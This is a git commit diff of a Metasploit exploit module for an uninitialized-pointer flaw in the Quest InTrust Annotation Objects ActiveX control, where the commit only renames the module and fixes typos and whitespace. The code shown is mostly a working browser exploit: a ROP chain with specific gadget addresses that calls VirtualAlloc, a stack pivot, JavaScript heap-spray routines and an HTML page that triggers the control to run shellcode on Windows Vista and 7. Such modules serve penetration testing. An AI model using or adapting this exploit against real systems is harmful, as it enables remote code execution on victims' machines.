Module rename. Cleanup whitespace. Fix typos.
parent
14f85e406f
commit
0d739a1a51
|
@ -1,12 +1,8 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
###
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
@ -18,32 +14,31 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super( update_info(info,
|
||||
'Name' => 'Quest InTrust Annotation Objects uninitialized pointer remote code execution',
|
||||
'Name' => 'Quest InTrust Annotation Objects Uninitialized Pointer',
|
||||
'Description' => %q{
|
||||
This module exploits a uninitialized variable vulnerability in the
|
||||
This module exploits an uninitialized variable vulnerability in the
|
||||
Annotation Objects ActiveX component. The activeX component loads into memory without
|
||||
opting into ALSR so this module exploits the vulnerability against windows Vista and
|
||||
Windows 7 targets. A large heap spray is required to fulfil the requirement that EAX
|
||||
points to part of the rop chain in a heap chunk and the calculated call will hit the
|
||||
pivot in a seperate heap chunk. This will take some time in the users browser.
|
||||
Windows 7 targets. A large heap spray is required to fulfill the requirement that EAX
|
||||
points to part of the ROP chain in a heap chunk and the calculated call will hit the
|
||||
pivot in a separate heap chunk. This will take some time in the users browser.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'rgod <rgod[at]autistici.org>', # initial discovery & poc
|
||||
'mr_me <steventhomasseeley[at]gmail.com>', # msf module
|
||||
'rgod <rgod[at]autistici.org>', # initial discovery & poc
|
||||
'mr_me <steventhomasseeley[at]gmail.com>' # msf module
|
||||
],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '80662'],
|
||||
[ 'BID', '52765'],
|
||||
[ 'URL', 'http://www.exploit-db.com/exploits/18674/'],
|
||||
[ 'URL', 'http://www.exploit-db.com/exploits/18674/']
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'InitialAutoRunScript' => 'migrate -f',
|
||||
'InitialAutoRunScript' => 'migrate -f'
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
|
@ -114,8 +109,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
end
|
||||
|
||||
print_status("Target selected: #{my_target.name}") if datastore['VERBOSE']
|
||||
|
||||
# Re-generate the payload.
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
||||
|
@ -141,6 +134,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
memory = new Array();
|
||||
for (i=0;i<1000;i++){ memory[i] = block+shellcode; }
|
||||
}
|
||||
|
||||
function main(){
|
||||
heapspray();
|
||||
#{obj_name}.Add(#{my_target.ret},1);
|
||||
|
@ -156,39 +150,39 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
junk,
|
||||
junk,
|
||||
junk,
|
||||
0x44014075 # xchg eax,esp ; add [ecx],10 ; retn 8 (pivot)
|
||||
0x44014075 # xchg eax,esp ; add [ecx],10 ; retn 8 (pivot)
|
||||
].pack('V*')
|
||||
|
||||
rop_gadgets << [0x44015CEF].pack('V*') * 140 # padding of retn's
|
||||
|
||||
rop_gadgets << [
|
||||
0x44015CEF, # retn
|
||||
0x44015CEF, # retn
|
||||
0x44015CEF, # retn
|
||||
0x44015cee, # pop edx ; retn
|
||||
0x4401a130, # ptr to &VirtualAlloc() (IAT)
|
||||
0x44015ca4, # mov eax,[edx+4] ; retn
|
||||
0x44001218, # push eax ; dec eax ; pop esi ; pop ebp ; retn 14
|
||||
junk, # filler (compensate)
|
||||
0x440159bb, # pop ebp ; retn
|
||||
junk, # filler (retn offset compensation)
|
||||
junk, # filler (retn offset compensation)
|
||||
junk, # filler (retn offset compensation)
|
||||
junk, # filler (retn offset compensation)
|
||||
0x4400238A, # filler (pop edi ; pop esi ; pop ebp ; retn)
|
||||
0x440012c1, # push esp ; ret 08
|
||||
0x44016264, # pop ebx ; retn
|
||||
0x00004000, # 0x00000001-> ebx
|
||||
0x44015cc9, # pop edx ; retn
|
||||
0x00001000, # 0x00001000-> edx
|
||||
0x44017664, # pop ecx ; retn
|
||||
0x00000040, # 0x00000040-> ecx
|
||||
0x44017bd8, # pop edi ; retn
|
||||
0x44017ebe, # retn
|
||||
0x4400bf25, # pop eax ; retn
|
||||
0x0C0C2478, # pointer+0x0c to pop edi ; pop esi ; pop ebp ; retn
|
||||
0x44005C57, # pushad ; push 8 ; push ecx; push esi; call [eax+c]
|
||||
0x90909090, # nops, do not change as it changes the offset
|
||||
0x44015CEF, # retn
|
||||
0x44015CEF, # retn
|
||||
0x44015CEF, # retn
|
||||
0x44015cee, # pop edx ; retn
|
||||
0x4401a130, # ptr to &VirtualAlloc() (IAT)
|
||||
0x44015ca4, # mov eax,[edx+4] ; retn
|
||||
0x44001218, # push eax ; dec eax ; pop esi ; pop ebp ; retn 14
|
||||
junk, # filler (compensate)
|
||||
0x440159bb, # pop ebp ; retn
|
||||
junk, # filler (retn offset compensation)
|
||||
junk, # filler (retn offset compensation)
|
||||
junk, # filler (retn offset compensation)
|
||||
junk, # filler (retn offset compensation)
|
||||
0x4400238A, # filler (pop edi ; pop esi ; pop ebp ; retn)
|
||||
0x440012c1, # push esp ; ret 08
|
||||
0x44016264, # pop ebx ; retn
|
||||
0x00004000, # 0x00000001-> ebx
|
||||
0x44015cc9, # pop edx ; retn
|
||||
0x00001000, # 0x00001000-> edx
|
||||
0x44017664, # pop ecx ; retn
|
||||
0x00000040, # 0x00000040-> ecx
|
||||
0x44017bd8, # pop edi ; retn
|
||||
0x44017ebe, # retn
|
||||
0x4400bf25, # pop eax ; retn
|
||||
0x0C0C2478, # pointer+0x0c to pop edi ; pop esi ; pop ebp ; retn
|
||||
0x44005C57, # pushad ; push 8 ; push ecx; push esi; call [eax+c]
|
||||
0x90909090, # nops, do not change as it changes the offset
|
||||
0x90909090,
|
||||
0x90909090,
|
||||
0x90909090,
|
||||
|
@ -211,15 +205,19 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
var data = payload;
|
||||
while(data.length < 100000) { data += data; }
|
||||
var onemeg = data.substr(0, 64*1024/2);
|
||||
for (i=0; i<14; i++) {
|
||||
onemeg += data.substr(0, 64*1024/2);
|
||||
}
|
||||
|
||||
for (i=0; i<14; i++) {
|
||||
onemeg += data.substr(0, 64*1024/2);
|
||||
}
|
||||
|
||||
onemeg += data.substr(0, (64*1024/2)-(38/2));
|
||||
var block = new Array();
|
||||
for (i=0; i<700; i++) {
|
||||
block[i] = onemeg.substr(0, onemeg.length);
|
||||
}
|
||||
|
||||
for (i=0; i<700; i++) {
|
||||
block[i] = onemeg.substr(0, onemeg.length);
|
||||
}
|
||||
}
|
||||
|
||||
function main(){
|
||||
heapspray();
|
||||
#{obj_name}.Add(#{my_target.ret},1);
|
||||
|
@ -245,7 +243,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
</html>
|
||||
EOF
|
||||
|
||||
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
|
||||
peer = "#{cli.peerhost.ljust(16)} #{self.shortname}"
|
||||
print_status("#{peer} Sending HTML...")
|
||||
|
||||
#Remove the extra tabs from content
|
||||
content = content.gsub(/^\t\t/, '')
|